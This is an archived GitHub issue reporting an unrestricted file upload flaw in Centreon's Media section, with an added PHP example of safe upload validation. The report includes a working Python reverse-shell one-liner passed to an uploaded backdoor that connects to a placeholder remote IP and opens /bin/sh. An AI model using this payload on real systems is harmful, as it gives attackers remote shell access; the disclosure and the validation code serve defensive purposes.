This repository has been archived by the owner on Dec 13, 2022. It is now read-only.

Unrestricted file upload leading to code execution #2979

Closed
centreon opened this issue Jun 30, 2015 · 1 comment

@centreon
Collaborator


Author Name: Louis Ferret (Louis Ferret)
Original Redmine Issue: 6450, https://forge.centreon.com/issues/6450
Original Date: 2015-06-30


In the Media section, where you can upload a file image, upload a PHP file containing the following:

Then gain access to the shell by connecting to the website via https://website_url/centreon/img/media/test/backdoor.php?c=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("yyy.yyy.yyy.yyy",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

yyy.yyy.yyy.yyy being the IP address of a remote server.
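
Server-side checks that would reject the upload described in this report, as an added example that is not part of the original issue and is not Centreon's code. The function name `store_media_upload` and the `$mediaDir` parameter are hypothetical, and the set of accepted image types is an assumption.

```php
<?php
declare(strict_types=1);

// Hypothetical helper, not Centreon code: store an uploaded media image.
// $file is one entry of $_FILES; $mediaDir is an assumed, existing directory.
function store_media_upload(array $file, string $mediaDir): string
{
    // Detected content type => extension assigned by the server (assumed set).
    $allowed = [
        'image/png'  => 'png',
        'image/jpeg' => 'jpg',
        'image/gif'  => 'gif',
    ];

    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Upload failed or is not an HTTP upload.');
    }

    // Identify the type from the file's bytes, not from the client-supplied
    // file name or Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime === false || !isset($allowed[$mime])) {
        throw new RuntimeException('Only PNG, JPEG and GIF images are accepted.');
    }

    // Require that the file also parses as an image of the detected type.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== $mime) {
        throw new RuntimeException('File is not a valid image.');
    }

    // Server-generated name: the client controls neither the stored name nor
    // its extension, so a name such as backdoor.php is never written to disk.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($mediaDir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store the upload.');
    }
    chmod($dest, 0644); // readable by the web server, never executable

    return $name;
}
```

Content checks alone can be passed by a file that is both a valid image and contains script text, so the media directory should also be configured in the web server to serve files statically and never hand them to the PHP interpreter.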

@centreon
Collaborator Author


Original Redmine Comment
Author Name: Louis Ferret (Louis Ferret)
Original Date: 2015-06-30T17:28:14Z


Didn't think it would be published without validation; you should delete this ticket and keep the description.
